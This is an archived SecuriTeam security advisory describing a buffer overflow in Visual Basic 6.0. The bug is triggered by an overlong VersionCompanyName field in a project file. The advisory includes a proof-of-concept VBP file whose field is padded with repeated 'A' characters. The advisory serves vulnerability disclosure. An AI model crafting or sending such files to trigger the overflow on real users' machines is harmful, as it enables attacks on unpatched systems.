[EXPL] Visual Basic VersionCompanyName Buffer Overflow

- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.

- - - - - - - - -

Visual Basic VersionCompanyName Buffer Overflow

SUMMARY

A vulnerability in the way Visual Basic 6.0 handles the VersionCompanyName
field allows attackers that can trick a user into opening a crafted VBP
file to cause the program to execute arbitrary code.

DETAILS

Proof of Concept:
By supplying the following VBP file to Visual Basic 6.0 it is possible to
cause the program to overflow its internal buffer.

Type=Exe
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\..\WINDOWS\system32\stdole2.tlb#OLE Automation
Reference=*\G{420B2830-E718-11CF-893D-00A0C9054228}#1.0#0#..\..\..\..\..\WINDOWS\system32\scrrun.dll#Microsoft Scripting Runtime
Form=Form1.frm
Startup="Form1"
HelpFile=""
Command32=""
Name="Project1"
HelpContextID="0"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=0
AutoIncrementVer=0
ServerSupportFiles=0
VersionCompanyName="AAAAAAA<multiple A>AAAAAAAAAA"
CompilationType=0
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1

[MS Transaction Server]
AutoRefresh=1

ADDITIONAL INFORMATION

The information has been provided by <mailto:umz32.dll@xxxxxxxxx> UmZ.

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • [EXPL] phpBB Remote PHP Code Execution (viewtopic.php 2)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The following exploit code utilizes a vulnerability in phpBB to cause ... This bulletin is sent to members of the SecuriTeam mailing list. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [NEWS] PeopleSoft LONGCHAR and VARCHAR Data Upload (DoS)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... June 03 PeopleSoft contacted ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [NT] SHELL32.DLL Denial of Service
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... As a user browses through his hard-drive, Windows automatically analyses ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [NT] MSWebDVD Class (mswebdvd.dll) Null Pointer Assignment
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Internet Explorer can be crashed remotely ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [TOOL] VoIPong - VOIP Detector and Sniffer
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... * Easy installation and administration ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)